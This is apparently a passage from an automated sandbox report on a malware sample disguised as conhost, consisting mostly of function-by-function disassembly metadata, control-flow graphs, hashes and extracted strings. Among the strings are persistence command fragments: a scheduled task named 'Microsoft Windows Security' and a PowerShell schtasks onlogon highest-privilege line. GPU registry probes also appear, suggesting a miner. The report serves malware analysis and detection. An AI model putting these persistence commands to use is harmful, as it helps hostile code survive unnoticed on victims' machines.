                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$wcslen
                                                                                                                    • String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                    • API String ID: 1844840824-1300809496
                                                                                                                    • Opcode ID: bd9259ea0d1729b5cf9e0ce952a3d6b6275ea3bc021281c07f972dc68bf27981
                                                                                                                    • Instruction ID: 3ad68bd7863f575cfbc336b9ed0bd458c62196457ceef7641465a9cacf75a59b
                                                                                                                    • Opcode Fuzzy Hash: bd9259ea0d1729b5cf9e0ce952a3d6b6275ea3bc021281c07f972dc68bf27981
                                                                                                                    • Instruction Fuzzy Hash: 46525025D2CEC2D5F7329729A8073B473B8EF91384F0453B5DD89B12A1EF2EA2458345
                                                                                                                    Function 00007FF693C5EE40 Relevance: 31.7, APIs: 21, Instructions: 232memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 424 7ff693c5ee40-7ff693c5ee55 425 7ff693c5ee57-7ff693c5ee63 malloc 424->425 426 7ff693c5ee90-7ff693c5ee9d malloc 424->426 427 7ff693c5eed2-7ff693c5ef11 abort CreateSemaphoreW TlsAlloc 425->427 428 7ff693c5ee65-7ff693c5ee76 425->428 426->427 429 7ff693c5ee9f-7ff693c5eeb8 426->429 433 7ff693c5ef13-7ff693c5ef22 call 7ff693c667e0 427->433 434 7ff693c5ef30-7ff693c5ef36 GetLastError 427->434 431 7ff693c5eeba-7ff693c5eed1 memset 428->431 432 7ff693c5ee78-7ff693c5ee8d memcpy 428->432 429->431 429->432 436 7ff693c5ef27-7ff693c5ef29 433->436 434->436 437 7ff693c5ef2b-7ff693c5ef2f 436->437 438 7ff693c5ef38-7ff693c5ef5c abort 436->438 439 7ff693c5ef78-7ff693c5ef7f 438->439 440 7ff693c5ef5e-7ff693c5ef65 438->440 443 7ff693c5ef81-7ff693c5efa9 GetLastError TlsGetValue SetLastError 439->443 444 7ff693c5eff0-7ff693c5eff6 439->444 441 7ff693c5ef67-7ff693c5ef73 440->441 442 7ff693c5efe0-7ff693c5efe9 call 7ff693c5ee40 440->442 442->441 448 7ff693c5efaf-7ff693c5efb5 443->448 449 7ff693c5f060-7ff693c5f07a calloc 443->449 446 7ff693c5f10a-7ff693c5f111 444->446 447 7ff693c5effc-7ff693c5f006 444->447 446->443 451 7ff693c5f117-7ff693c5f12d 446->451 452 7ff693c5f00c-7ff693c5f014 447->452 453 7ff693c5f138-7ff693c5f140 447->453 456 7ff693c5efbb-7ff693c5efc7 448->456 457 7ff693c5f0a8-7ff693c5f0cf realloc 448->457 454 7ff693c5f193-7ff693c5f1a3 abort 449->454 455 7ff693c5f080 449->455 459 7ff693c5f01a-7ff693c5f021 452->459 460 7ff693c5f16c-7ff693c5f180 WaitForSingleObject 452->460 461 7ff693c5f142-7ff693c5f15a 453->461 462 7ff693c5f0f1-7ff693c5f0f6 call 7ff693c5eee0 453->462 465 7ff693c5f1a5-7ff693c5f1a8 454->465 466 7ff693c5f1b0-7ff693c5f1b4 454->466 463 7ff693c5f083-7ff693c5f094 TlsSetValue 455->463 456->441 464 7ff693c5efc9-7ff693c5efd6 call 7ff693c5ee40 456->464 457->454 458 7ff693c5f0d5-7ff693c5f0ef memset 457->458 458->463 459->451 470 7ff693c5f027-7ff693c5f02b 459->470 460->459 473 7ff693c5f186-7ff693c5f18e 460->473 471 7ff693c5f15c 461->471 472 7ff693c5f100-7ff693c5f104 461->472 462->472 463->456 474 7ff693c5f09a-7ff693c5f09d GetLastError 463->474 464->441 465->466 467 7ff693c5f1ba-7ff693c5f1bd 466->467 468 7ff693c5f1b6 466->468 477 7ff693c5f1c4 467->477 478 7ff693c5f1bf-7ff693c5f1c2 467->478 468->467 470->443 480 7ff693c5f031-7ff693c5f039 470->480 481 7ff693c5f160-7ff693c5f168 Sleep 471->481 472->446 472->452 473->459 474->456 478->477 482 7ff693c5f1c8-7ff693c5f1cc 478->482 480->443 483 7ff693c5f03f-7ff693c5f054 ReleaseSemaphore 480->483 481->481 484 7ff693c5f16a 481->484 483->443 484->472
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 342303811-0
                                                                                                                    • Opcode ID: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                    • Instruction ID: b094965e48fba0ff0ccfaba4c85db098d255e8d41a58a631e553f9f4e5de7f7e
                                                                                                                    • Opcode Fuzzy Hash: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                    • Instruction Fuzzy Hash: C2915C32E0DF42C1EA799F25A8026B922B9EF44B84F5885B5DD1DE7394DF3CE9429340
                                                                                                                    Function 00007FF693C676F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                                                    • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                    • API String ID: 802779101-808685626
                                                                                                                    • Opcode ID: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                    • Instruction ID: 6b7f5fb6f0e1ed486870fb57804842ac86c7e9680148a9643af9c86115f5074e
                                                                                                                    • Opcode Fuzzy Hash: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                    • Instruction Fuzzy Hash: 39417E20B1D913C5FA30A762A8277B93AA9DF85B8CF4041B9E90DE77D2DD2DE5018312
                                                                                                                    Function 00007FF693C5E8F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 127COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaiseUnwindabort
                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$CCG $CCG!$CCG!$CCG"
                                                                                                                    • API String ID: 4140830120-965913644
                                                                                                                    • Opcode ID: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                    • Instruction ID: 3ed03e5537e8b8ddc57c7b5a3a3af0fdaaafb59e97bc1d35e59cdd8b3f428917
                                                                                                                    • Opcode Fuzzy Hash: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                    • Instruction Fuzzy Hash: 39518972A08A81C2E7708B25E4456E973B8F789B98F545236EECDA3758DF39E581C700
                                                                                                                    Function 00007FF693C5C2E0 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 544 7ff693c5c2e0-7ff693c5c30b 545 7ff693c5c708-7ff693c5c712 544->545 546 7ff693c5c311-7ff693c5c32b strncmp 544->546 545->546 547 7ff693c5c718 545->547 548 7ff693c5c686-7ff693c5c68f 546->548 549 7ff693c5c331-7ff693c5c366 546->549 547->549 548->549 550 7ff693c5c695-7ff693c5c6a3 548->550 551 7ff693c5c42b-7ff693c5c495 strlen 549->551 550->549 552 7ff693c5c6a9-7ff693c5c6af 550->552 553 7ff693c5c49b-7ff693c5c4e5 call 7ff693c5e3d0 * 2 551->553 554 7ff693c5c71d 551->554 556 7ff693c5c6b9-7ff693c5c6c0 552->556 557 7ff693c5c6b1-7ff693c5c6b3 552->557 563 7ff693c5c4eb-7ff693c5c4ee 553->563 564 7ff693c5c370-7ff693c5c373 553->564 555 7ff693c5c71f-7ff693c5c732 554->555 556->549 559 7ff693c5c6c6-7ff693c5c6d3 556->559 557->549 557->556 559->549 567 7ff693c5c417-7ff693c5c41b 563->567 568 7ff693c5c4f4-7ff693c5c500 563->568 565 7ff693c5c379-7ff693c5c385 564->565 566 7ff693c5c640-7ff693c5c650 call 7ff693c54e50 564->566 570 7ff693c5c387-7ff693c5c38b 565->570 571 7ff693c5c391-7ff693c5c3a0 strlen 565->571 576 7ff693c5c658-7ff693c5c66a 566->576 573 7ff693c5c733 567->573 574 7ff693c5c421-7ff693c5c428 567->574 568->567 572 7ff693c5c506-7ff693c5c518 568->572 570->571 570->576 577 7ff693c5c6fc-7ff693c5c700 571->577 578 7ff693c5c3a6-7ff693c5c3bf 571->578 579 7ff693c5c6ec-7ff693c5c6f4 call 7ff693c57190 572->579 580 7ff693c5c51e-7ff693c5c520 572->580 581 7ff693c5c735-7ff693c5c738 573->581 574->551 583 7ff693c5c66c-7ff693c5c66e 576->583 584 7ff693c5c6d8-7ff693c5c6e7 call 7ff693c57190 576->584 577->545 578->577 585 7ff693c5c3c5-7ff693c5c3e1 578->585 579->577 580->579 586 7ff693c5c526-7ff693c5c541 call 7ff693c57c00 580->586 581->555 583->584 588 7ff693c5c670-7ff693c5c681 call 7ff693c57c00 583->588 589 7ff693c5c3e5-7ff693c5c406 call 7ff693c54140 strlen 584->589 585->589 598 7ff693c5c40a-7ff693c5c40d 586->598 599 7ff693c5c547-7ff693c5c549 586->599 588->589 589->598 598->567 600 7ff693c5c40f-7ff693c5c411 598->600 599->598 601 7ff693c5c54f 599->601 600->567 602 7ff693c5c73a-7ff693c5c7d0 call 7ff693c544c0 600->602 603 7ff693c5c550-7ff693c5c568 601->603 611 7ff693c5c7dc-7ff693c5c883 call 7ff693c5e3d0 * 2 call 7ff693c5af20 602->611 612 7ff693c5c7d2 602->612 604 7ff693c5c894-7ff693c5c89b 603->604 605 7ff693c5c56e-7ff693c5c571 603->605 607 7ff693c5c57f-7ff693c5c587 604->607 608 7ff693c5c8a1-7ff693c5c8a4 604->608 605->604 609 7ff693c5c577-7ff693c5c579 605->609 615 7ff693c5c599-7ff693c5c5b1 607->615 608->607 613 7ff693c5c8aa-7ff693c5c8b0 608->613 609->607 614 7ff693c5c888-7ff693c5c88f 609->614 611->581 612->611 619 7ff693c5c5c0-7ff693c5c5c2 613->619 614->598 616 7ff693c5c5b3-7ff693c5c5b5 615->616 617 7ff693c5c590-7ff693c5c595 615->617 616->617 620 7ff693c5c5b7 616->620 617->615 622 7ff693c5c5fd-7ff693c5c628 call 7ff693c54240 call 7ff693c54140 619->622 623 7ff693c5c5c4-7ff693c5c5ce 619->623 620->619 622->598 636 7ff693c5c62e-7ff693c5c631 622->636 623->622 625 7ff693c5c5d0-7ff693c5c5e2 623->625 625->619 628 7ff693c5c5e4 625->628 631 7ff693c5c5e8-7ff693c5c5f7 628->631 631->631 634 7ff693c5c5f9-7ff693c5c5fb 631->634 634->622 634->623 636->603
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: strlenstrncmp
                                                                                                                    • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                    • API String ID: 1310274236-662103887
                                                                                                                    • Opcode ID: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                    • Instruction ID: d979718a367f349c231db3c12cd3628e77c9d2f69fc9446dd780bc1a9081c82f
                                                                                                                    • Opcode Fuzzy Hash: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                    • Instruction Fuzzy Hash: 5DE1DC76A0CA82C9E7308F7198063FD3BB9EB04789F448171DA5DEA789DF38D6429700
                                                                                                                    Function 00007FF693C5DB76 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 638 7ff693c5db76-7ff693c5db9b 639 7ff693c5dba1-7ff693c5dba6 638->639 640 7ff693c5dcf0-7ff693c5dcf4 638->640 642 7ff693c5dba8-7ff693c5dbad 639->642 643 7ff693c5dc03-7ff693c5dc08 639->643 640->639 641 7ff693c5dcfa 640->641 644 7ff693c5dc50 641->644 647 7ff693c5dc22-7ff693c5dc32 signal 642->647 648 7ff693c5dbaf-7ff693c5dbb4 642->648 645 7ff693c5dcc5-7ff693c5dcd5 call 7ff693c66698 643->645 646 7ff693c5dc0e 643->646 649 7ff693c5dc55-7ff693c5dc5a 644->649 652 7ff693c5dcd7-7ff693c5dcda 645->652 664 7ff693c5dd10-7ff693c5dd24 signal 645->664 650 7ff693c5dc60-7ff693c5dc65 646->650 651 7ff693c5dc10-7ff693c5dc15 646->651 647->652 653 7ff693c5dc38-7ff693c5dc4c signal call 7ff693c5d530 647->653 648->644 655 7ff693c5dbba 648->655 650->644 660 7ff693c5dc67-7ff693c5dc6c 650->660 651->644 661 7ff693c5dc17-7ff693c5dc1c 651->661 658 7ff693c5dcdc-7ff693c5dce8 652->658 659 7ff693c5dcae-7ff693c5dcb8 652->659 653->644 656 7ff693c5dca0-7ff693c5dca5 655->656 657 7ff693c5dbc0-7ff693c5dbc5 655->657 666 7ff693c5dc6e-7ff693c5dc7e signal 656->666 667 7ff693c5dca7-7ff693c5dcac 656->667 657->644 665 7ff693c5dbcb-7ff693c5dbd0 657->665 658->649 668 7ff693c5dcba-7ff693c5dcc1 659->668 669 7ff693c5dd00-7ff693c5dd07 659->669 660->659 660->666 661->647 661->659 664->649 665->659 671 7ff693c5dbd6-7ff693c5dbe6 signal 665->671 673 7ff693c5dd29-7ff693c5dd3b signal 666->673 674 7ff693c5dc84-7ff693c5dc87 666->674 667->644 667->659 668->645 675 7ff693c5dbec-7ff693c5dbef 671->675 676 7ff693c5dd40-7ff693c5dd52 signal 671->676 673->649 674->659 677 7ff693c5dc89-7ff693c5dc95 674->677 675->659 678 7ff693c5dbf5-7ff693c5dc01 675->678 676->649 677->649 678->649
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: signal
                                                                                                                    • String ID: CCG
                                                                                                                    • API String ID: 1946981877-1584390748
                                                                                                                    • Opcode ID: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                    • Instruction ID: 86a77feec59ec2b2829f4b1b875118c3d3758d1910bdc1f3fb39818cd26ea729
                                                                                                                    • Opcode Fuzzy Hash: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                    • Instruction Fuzzy Hash: 5A415320E3DE83C5FA781578545B37826A9DF85364F184AB5D52EE63E2CDACB8C04312
                                                                                                                    Function 00007FF693C5D540 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryVirtual
                                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                    • API String ID: 1804819252-1534286854
                                                                                                                    • Opcode ID: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                    • Instruction ID: e3ad8c7a54bf7959962f74a2ff1a772f0c54aeae82f0cfb53ff7140bef9c5233
                                                                                                                    • Opcode Fuzzy Hash: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                    • Instruction Fuzzy Hash: 5761DF72A2AF42C6EB209F11E8466B977B8EB45794F444175DE4DE7394EE3CE541C300
                                                                                                                    Function 00007FF693C61640 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fwprintf
                                                                                                                    • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                    • API String ID: 968622242-2115465065
                                                                                                                    • Opcode ID: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                    • Instruction ID: afa7ebb78f043162bfb1ee4b5a9d5f2c2f21858e7bcd0ddcda74a8601cf0efb4
                                                                                                                    • Opcode Fuzzy Hash: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                    • Instruction Fuzzy Hash: 2841A072A18A43C5E7709E25E4026BD76B9EB90BA9F1881B5DA4CD77C5EE3CE5018B00
                                                                                                                    Function 00007FF693C618F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*.*s$%-*.*s$%.*s$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                                                    • API String ID: 0-2632607494
                                                                                                                    • Opcode ID: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                    • Instruction ID: 6005b5881f4a4d23dbe2df840583d17372fb587a997a9e816f07657fede6c264
                                                                                                                    • Opcode Fuzzy Hash: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                    • Instruction Fuzzy Hash: 1A41A272A18A57C5E7709E25950267C73B9EB4079DF18C1B5DE4EEA2C5EE7CE4018B00
                                                                                                                    Function 00007FF693C52BA0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4116713110.00007FF693C51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF693C50000, based on PE: true
                                                                                                                    • Associated: 00000018.00000002.4116680107.00007FF693C50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116777805.00007FF693C6A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116833508.00007FF693C6C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C73000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116887796.00007FF693C75000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000018.00000002.4116986782.00007FF693C78000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ff693c50000_conhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcscatwcscpywcslen
                                                                                                                    • String ID: \??\$eth
                                                                                                                    • API String ID: 468205783-1480138707
                                                                                                                    • Opcode ID: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                    • Instruction ID: 5726e6d637e5dd6b1426f1fd30ab3e6f3bab40cb6f040f5ae768b910cc265f22
                                                                                                                    • Opcode Fuzzy Hash: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                    • Instruction Fuzzy Hash: B0319E21A18F82C4F7209B65E80337533B8EF95798F0482B5D94DE67A1EF3CA1848341
                                                                                                                    Function 00007FF693C5D7B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNEL32(00007FF693C74958,00007FF693C74950,00007FF693C73E20,00007FFE2167ADA0,?,?,?,00000001,00007FF693C5124C), ref: 00007FF693C5D96D
                                                                                                                      • Part of subcall function 00007FF693C5D5B0: VirtualQuery.KERNEL32 ref: 00007FF693C5D65B
                                                                                                                    Strings
                                                                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF693C5DB03
